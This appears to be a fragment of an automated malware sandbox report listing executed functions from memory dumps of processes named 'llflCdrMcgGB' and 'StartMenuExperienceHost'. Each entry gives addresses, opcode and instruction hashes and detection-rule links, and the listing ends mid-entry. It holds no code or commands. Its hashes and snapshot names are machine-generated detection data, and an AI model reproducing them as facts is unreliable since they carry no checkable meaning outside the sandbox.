                                                      • Opcode Fuzzy Hash: 2b46257708f436c5923578b8ae170b8e8b194bd4aeb4b50011f654afdbe41f5c
                                                      • Instruction Fuzzy Hash: 26C04C345518098FCA48FB29C88591577A0FB1D215BD510A0E409C7271D659DCD5CB41
                                                      Function 00007FF7C17A0B18 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000029.00000002.1503337738.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_41_2_7ff7c17a0000_llflCdrMcgGB.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c7a7ad0f78c49ac88e4e27d5cff6dad67509f45549e82e338b8b02ad93a7c8e
                                                      • Instruction ID: 4b2dee4d8cc9528dffff114ae4d5e273bd1100943b165de4f938cbf70b01ec0d
                                                      • Opcode Fuzzy Hash: 1c7a7ad0f78c49ac88e4e27d5cff6dad67509f45549e82e338b8b02ad93a7c8e
                                                      • Instruction Fuzzy Hash: D2C04C305118198FCA44FB6DC98595476A0FB0D225BD511E0E40DC7171E65ADC95C741
                                                      Function 00007FF7C17A464B Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000029.00000002.1503337738.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_41_2_7ff7c17a0000_llflCdrMcgGB.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b12a104d8ed8a1a2ee27811ec35f533ecfeba0dc487b6b1d91ca4d019c5b2f2
                                                      • Instruction ID: e67a3a974f5576f76503deb84158573d6127ed24e30b4d0cfbecec403ba156d5
                                                      • Opcode Fuzzy Hash: 2b12a104d8ed8a1a2ee27811ec35f533ecfeba0dc487b6b1d91ca4d019c5b2f2
                                                      • Instruction Fuzzy Hash: B1C04C51E1C81746F659661844112BE44529F95754F9401B8E01DC73C7DE4D6A01028B
                                                      Function 00007FF7C17A0548 Relevance: .0, Instructions: 9COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000029.00000002.1503337738.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_41_2_7ff7c17a0000_llflCdrMcgGB.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 473bf2f2d6d738438761132f2a40cd3d6c140b2d05cc50790289fbb38b3576c1
                                                      • Instruction ID: 384ba105ec909069b0327c90957f752cfd80eaf905e1987422a4e476ba96489f
                                                      • Opcode Fuzzy Hash: 473bf2f2d6d738438761132f2a40cd3d6c140b2d05cc50790289fbb38b3576c1
                                                      • Instruction Fuzzy Hash: 39B01234C5B60B85EB28FA770842064F460AF0F229FD026B4D40841283D8EF50D54652
                                                      Function 00007FF7C17A06D0 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000029.00000002.1503337738.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_41_2_7ff7c17a0000_llflCdrMcgGB.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2f9a43a3e202649a4026ef8806b21b406c16f3f06bca05c6ccecb1836bb0331
                                                      • Instruction ID: 89a6ea73915a2e92c588b193378182b31302ee03364fe5367e29ec6fb6d77011
                                                      • Opcode Fuzzy Hash: c2f9a43a3e202649a4026ef8806b21b406c16f3f06bca05c6ccecb1836bb0331
                                                      • Instruction Fuzzy Hash: 3BB00204C5644F01A55476BB1946065F4906B4D324FD52570E44D51187A8CD65991267
                                                      Function 00007FF7C17A0528 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000029.00000002.1503337738.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_41_2_7ff7c17a0000_llflCdrMcgGB.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4240f07aa1fa7878a1268ac9f6d40dffa0b3b3bb61059715db6846cbbd43602e
                                                      • Instruction ID: d57871ce9e8817ff4ab4990268eefcde93509aab6d9b3c4de076c10d42a20a12
                                                      • Opcode Fuzzy Hash: 4240f07aa1fa7878a1268ac9f6d40dffa0b3b3bb61059715db6846cbbd43602e
                                                      • Instruction Fuzzy Hash: 76B00204C9751B01E61439B71D86569F4505B4D165FD521B0D81D4058798CD55A65173
                                                      Function 00007FF7C17C2730 Relevance: .0, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000029.00000002.1503337738.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_41_2_7ff7c17c1000_llflCdrMcgGB.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8f8dd5cfd59d6fea0cce7bc41531324c98643eb989b25d3a6ed71fca89bc5ef
                                                      • Instruction ID: 97c090cc5931802c8151a93d24e2574239bb0012a022e6715997037cf37a7afc
                                                      • Opcode Fuzzy Hash: d8f8dd5cfd59d6fea0cce7bc41531324c98643eb989b25d3a6ed71fca89bc5ef
                                                      • Instruction Fuzzy Hash: 74A00204C9784E05A94875BB1D87094F4549BCD124FC52170EC48802C7ECCE15E902A3

                                                      Executed Functions

                                                      Function 00007FF7C17B0D78 Relevance: .3, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 24c66dfa6cefaf0e335ab2b27bdbf6c1ef60552e2540ce07d5552aaa431f17dc
                                                      • Instruction ID: cf57ad1ef99532360636243b2db127289db277989e34179afd4659901fe3b068
                                                      • Opcode Fuzzy Hash: 24c66dfa6cefaf0e335ab2b27bdbf6c1ef60552e2540ce07d5552aaa431f17dc
                                                      • Instruction Fuzzy Hash: C991A1B0E18A898FE755EBAC88597A97FE1FFA9314F4001BEC00AD7792CB785411C741
                                                      Function 00007FF7C17B0908 Relevance: .1, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d49867a30479c50f79946d15ba11b3345fc86f3582e73c4fae7224a3762d29da
                                                      • Instruction ID: 580b5412f5a6035e181c7081b52754debe860871afd7dba08c566b2587b66cca
                                                      • Opcode Fuzzy Hash: d49867a30479c50f79946d15ba11b3345fc86f3582e73c4fae7224a3762d29da
                                                      • Instruction Fuzzy Hash: 5B21D83130CC184FD768EE1CE889DB973D1EF5932171501BAE58AC7266DD51EC8287C1
                                                      Function 00007FF7C17B090D Relevance: .1, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9231cd0d30b2321c2a44353c6fcf8cd0e00f094309b2ea1cacc82dad5498e4ab
                                                      • Instruction ID: a9649938d6478c3ae5787d438fe7bd2eeb43129f27d75009fd977271525c62d9
                                                      • Opcode Fuzzy Hash: 9231cd0d30b2321c2a44353c6fcf8cd0e00f094309b2ea1cacc82dad5498e4ab
                                                      • Instruction Fuzzy Hash: 31312612E0C95A6BE315B77C648E3F8A785EF54364F54457BD40DC72B7DE28B8818288
                                                      Function 00007FF7C17B0998 Relevance: .1, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 12c1f42d0c7d2c521106fb62ebb6f03ddef9d4e364a503742f0d1a68f6ec7851
                                                      • Instruction ID: b5ed48f4d022ad9148dc8f2f80efb5a006eaef9ed84ec717887a38e5309ed7bd
                                                      • Opcode Fuzzy Hash: 12c1f42d0c7d2c521106fb62ebb6f03ddef9d4e364a503742f0d1a68f6ec7851
                                                      • Instruction Fuzzy Hash: 7A21C520B289590FE798F72D5459675B6C2EF9C325B4000B9E80EC3397DE58EC414295
                                                      Function 00007FF7C17B0C25 Relevance: .1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 96aee87f6c07567533f7ae982d27f392f973c8478566d47153a06977cfbf797e
                                                      • Instruction ID: 162e913279fbc36238292e23029439dcb62c6bf87bcc7d09a2bed3d6940dec7e
                                                      • Opcode Fuzzy Hash: 96aee87f6c07567533f7ae982d27f392f973c8478566d47153a06977cfbf797e
                                                      • Instruction Fuzzy Hash: 7D21F071A0C3898FE302EF69C8082EDBFB0EF56324F5485B6C4459B193DB78A545CBA5
                                                      Function 00007FF7C17B1F88 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4865d83ac15d023243749916c2d68cb14afa4e439f54bb3c3e26b78e663b927e
                                                      • Instruction ID: f05173da62c9e7b20832ad1da95ab3624fe87e6af2db5090aef57faac086b3ec
                                                      • Opcode Fuzzy Hash: 4865d83ac15d023243749916c2d68cb14afa4e439f54bb3c3e26b78e663b927e
                                                      • Instruction Fuzzy Hash: AA118632E1D9198EEB64FE1994496FCA292EF6C331F9011B6D80DD31D7DFA878418760
                                                      Function 00007FF7C17B1FC9 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7aa8cadbddb7b172ff78e90f89724f1160155fb31785e1485b90f3f62ab09057
                                                      • Instruction ID: 24efe8c3bba6eb83c64c1ea4b09a15639080e31692fe1455d35dba18638ccbae
                                                      • Opcode Fuzzy Hash: 7aa8cadbddb7b172ff78e90f89724f1160155fb31785e1485b90f3f62ab09057
                                                      • Instruction Fuzzy Hash: 4E113030A0840A8FEB54FF19C448BB8A3A2EF68321F9041B5D80DC3193DFA8E8418B50
                                                      Function 00007FF7C17B0C38 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1fc7bd0b0b7cee992631e0dd51935939272330108adeda92113a8f6078c8c8fa
                                                      • Instruction ID: 2112a6e2924352743d660bf912c06a091d4182f732d4b25384dd22b2b92e1ea1
                                                      • Opcode Fuzzy Hash: 1fc7bd0b0b7cee992631e0dd51935939272330108adeda92113a8f6078c8c8fa
                                                      • Instruction Fuzzy Hash: B811AC35A0C7888FE702EB68C8492EDBFB0EF56220F1545B6C484DB293E774A6098795
                                                      Function 00007FF7C17B0C40 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62409c0cb7af9f0564ccd3fff60a0df169c9fc446e326965fe7a132f040725d1
                                                      • Instruction ID: 5a170dd74c5eb33ca7bc039c6d5ae601f4f0c06c33bfda615657bd5ecfef9fb7
                                                      • Opcode Fuzzy Hash: 62409c0cb7af9f0564ccd3fff60a0df169c9fc446e326965fe7a132f040725d1
                                                      • Instruction Fuzzy Hash: BE018B35A087888FE702EB68C8482D9BFB0AF56220F1545B6C481DB293D774A648CB90
                                                      Function 00007FF7C17B0C48 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5129080648f6040b37c522720f4214fff51a8962782b14c5a6c77f5f1f69eb2f
                                                      • Instruction ID: 74f0fc53e17fac451fce7497f4db6b67ab93905999bfd492128ecfed4309466f
                                                      • Opcode Fuzzy Hash: 5129080648f6040b37c522720f4214fff51a8962782b14c5a6c77f5f1f69eb2f
                                                      • Instruction Fuzzy Hash: 4E015E7590D3889FD702EF74C84429DBFB0AF46314F1545EAD441DB2A3D774A644C791
                                                      Function 00007FF7C17B0C50 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c900d0101946b5bc2a99759e6439f3a1be84d348402a1cda32fff17a24705fb
                                                      • Instruction ID: 79f37841a57729f3a6fd9d780a9fa35d76bc240b8b7bdd5a99accd7e8cece108
                                                      • Opcode Fuzzy Hash: 6c900d0101946b5bc2a99759e6439f3a1be84d348402a1cda32fff17a24705fb
                                                      • Instruction Fuzzy Hash: 2E018B7490D3889FE702EB74C84829DBFB0AF06314F1445EAC881DB293EB78AA44C791
                                                      Function 00007FF7C17B2096 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c0b67d8018478311337d0be313e8e759ba3daf077f094f559c4b14e2bffb0724
                                                      • Instruction ID: 63cb72b5d72f95fcd6b33bd21d44c3b88c398a17f8a17fe3237dfd12d391a000
                                                      • Opcode Fuzzy Hash: c0b67d8018478311337d0be313e8e759ba3daf077f094f559c4b14e2bffb0724
                                                      • Instruction Fuzzy Hash: 76F0E631D5940A8EEB64FE15C855BF8B262EF68321F5401B9D80DD3193DFBDA9418B60
                                                      Function 00007FF7C17B20CF Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1d35f1724f1adc6db49046a45d6106ecbbea99bb5a5f4fe40b332a5eb99e0b2
                                                      • Instruction ID: 6ccc3ec26827ac6c14fc651122a9e23cb60afb111bf236cb72fcf0db51f44fa4
                                                      • Opcode Fuzzy Hash: f1d35f1724f1adc6db49046a45d6106ecbbea99bb5a5f4fe40b332a5eb99e0b2
                                                      • Instruction Fuzzy Hash: 08F03031E1C4098AEB10FE05C488AB8A362AF6D360FA041B5CC0DD31E3DFADB9418760
                                                      Function 00007FF7C17B2B40 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f7ab15e07f9f44bd1b39b12e138568b7c5039ab6e02509fa8ce3889be5409fc
                                                      • Instruction ID: f67514a5bf3078ac64590bf619b32f74970855419607907847de711d07f64883
                                                      • Opcode Fuzzy Hash: 8f7ab15e07f9f44bd1b39b12e138568b7c5039ab6e02509fa8ce3889be5409fc
                                                      • Instruction Fuzzy Hash: FFF03030E0911A4FF754FA15C4147BAA3A09FA9324F940075DD4D972D3DF68ED418715
                                                      Function 00007FF7C17B0B95 Relevance: .0, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 803acc49ec18d0d45acb6fb8da7e053dd471638d528cdc735f0ecc15faf31192
                                                      • Instruction ID: 75713696015be674c8e10e2bf7436ff1cb40d7bce367fe93f64a1fa4eeb01bd2
                                                      • Opcode Fuzzy Hash: 803acc49ec18d0d45acb6fb8da7e053dd471638d528cdc735f0ecc15faf31192
                                                      • Instruction Fuzzy Hash: DCD0A73012954E4FDA00F73CC8498547BA0EB1F224FE510F1D00AC7962C60948658700
                                                      Function 00007FF7C17B06AD Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 38bafcb96ffc316238749f9f8e05cf376279ef606639981b862e7a8e05f1742f
                                                      • Instruction ID: 44f625bf2688dc5396b9222e4dc1c57e9e7a88db57fd064f4eb6d35829fad523
                                                      • Opcode Fuzzy Hash: 38bafcb96ffc316238749f9f8e05cf376279ef606639981b862e7a8e05f1742f
                                                      • Instruction Fuzzy Hash: DEC08C00D0B60B00A650BA2F180A0ACE1205FEC338FF00032CC0C40083AECE60C6017E
                                                      Function 00007FF7C17B12E8 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b46257708f436c5923578b8ae170b8e8b194bd4aeb4b50011f654afdbe41f5c
                                                      • Instruction ID: dd3e9d03df26c9ff7bd971acf68f7e59aea517c26f4687738445973cdf0d703b
                                                      • Opcode Fuzzy Hash: 2b46257708f436c5923578b8ae170b8e8b194bd4aeb4b50011f654afdbe41f5c
                                                      • Instruction Fuzzy Hash: 3CC04C345558099FCA48FB2AC88991477A0FB1D215BD500A0E409C7271D659DCD5CB41
                                                      Function 00007FF7C17B0B18 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c7a7ad0f78c49ac88e4e27d5cff6dad67509f45549e82e338b8b02ad93a7c8e
                                                      • Instruction ID: 7878cd7a7e9e50b2a1547b5bc14a8a6d033a8288c9baf7e269e537c6ecdfa004
                                                      • Opcode Fuzzy Hash: 1c7a7ad0f78c49ac88e4e27d5cff6dad67509f45549e82e338b8b02ad93a7c8e
                                                      • Instruction Fuzzy Hash: DFC04C305118198FDB44FB6DC98595476A0FB1D225BD501E0E40DC7171E65A9C95C741
                                                      Function 00007FF7C17B464B Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 018066736173c7b498536b25936f8d06795e2bd2735e90f5c88f3ffcdc0e44bc
                                                      • Instruction ID: 68c44cc1e0b1da966ec771fd364f40c984b15a203b6152737d715a410cff208b
                                                      • Opcode Fuzzy Hash: 018066736173c7b498536b25936f8d06795e2bd2735e90f5c88f3ffcdc0e44bc
                                                      • Instruction Fuzzy Hash: 76C04C50E1C81A46F655A658441127E44525FA5758F9401B4E41E873C7CF4D6A01028F
                                                      Function 00007FF7C17B0548 Relevance: .0, Instructions: 9COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 473bf2f2d6d738438761132f2a40cd3d6c140b2d05cc50790289fbb38b3576c1
                                                      • Instruction ID: 06fcb886e2c6301bd6bdace69cc52b34381de0b05e2c5fa21cece768226414da
                                                      • Opcode Fuzzy Hash: 473bf2f2d6d738438761132f2a40cd3d6c140b2d05cc50790289fbb38b3576c1
                                                      • Instruction Fuzzy Hash: F7B01230C5760B85EB28FA731882064F060AF1E229FD006B4EC0841283DAEF50D54652
                                                      Function 00007FF7C17B06D0 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2f9a43a3e202649a4026ef8806b21b406c16f3f06bca05c6ccecb1836bb0331
                                                      • Instruction ID: 65399facc56940f73ba788d76ca9234594c851abec1458b36fdf3f45c675f418
                                                      • Opcode Fuzzy Hash: c2f9a43a3e202649a4026ef8806b21b406c16f3f06bca05c6ccecb1836bb0331
                                                      • Instruction Fuzzy Hash: 4DB01200C5640F00A544B67B0C46064F0506F5C220FD40070DC0C50083A9CD10940277
                                                      Function 00007FF7C17B0528 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4240f07aa1fa7878a1268ac9f6d40dffa0b3b3bb61059715db6846cbbd43602e
                                                      • Instruction ID: 8dd36b3c865da7dfdceeaddbe9ec3afe893ad888284f26cb2cdae2d796312ad5
                                                      • Opcode Fuzzy Hash: 4240f07aa1fa7878a1268ac9f6d40dffa0b3b3bb61059715db6846cbbd43602e
                                                      • Instruction Fuzzy Hash: 9CB01200C5740F00D60475B71C82068F4105F5E120FE000B0DC0C40083A9CD10960173

                                                      Executed Functions

                                                      Function 00007FF7C17A0D78 Relevance: .3, Instructions: 255COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002B.00000002.1494474083.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_43_2_7ff7c17a0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d0b4b252d4cfaa5be531fa7c7390373914d54f840d14a6155fe0a8428e04d7a8
                                                      • Instruction ID: 8bd127a236e2f6fa3dd12e7bd1b24d6626d62a214c075bf72b6d2c804ff6c361
                                                      • Opcode Fuzzy Hash: d0b4b252d4cfaa5be531fa7c7390373914d54f840d14a6155fe0a8428e04d7a8
                                                      • Instruction Fuzzy Hash: 9791C475A18A898FE789DF6D88A83A9BFE1FF5A311F4001BEC049D7792DBB85411C701
                                                      Function 00007FF7C17A0908 Relevance: .1, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002B.00000002.1494474083.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_43_2_7ff7c17a0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2970d6966922015f1e7144b44bcded8f54c60ce91cbff2c87ada44d8df070fd3
                                                      • Instruction ID: 0108445ca326648d59aa6ce58f35893ad4344878b6c1e9d13f1e3dc21b96f227
                                                      • Opcode Fuzzy Hash: 2970d6966922015f1e7144b44bcded8f54c60ce91cbff2c87ada44d8df070fd3
                                                      • Instruction Fuzzy Hash: 5F21D63130CC184FE768EA1CE88ADB973D1EB9932170511BAE58AC7166ED51EC8287C1
                                                      Function 00007FF7C17A090D Relevance: .1, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
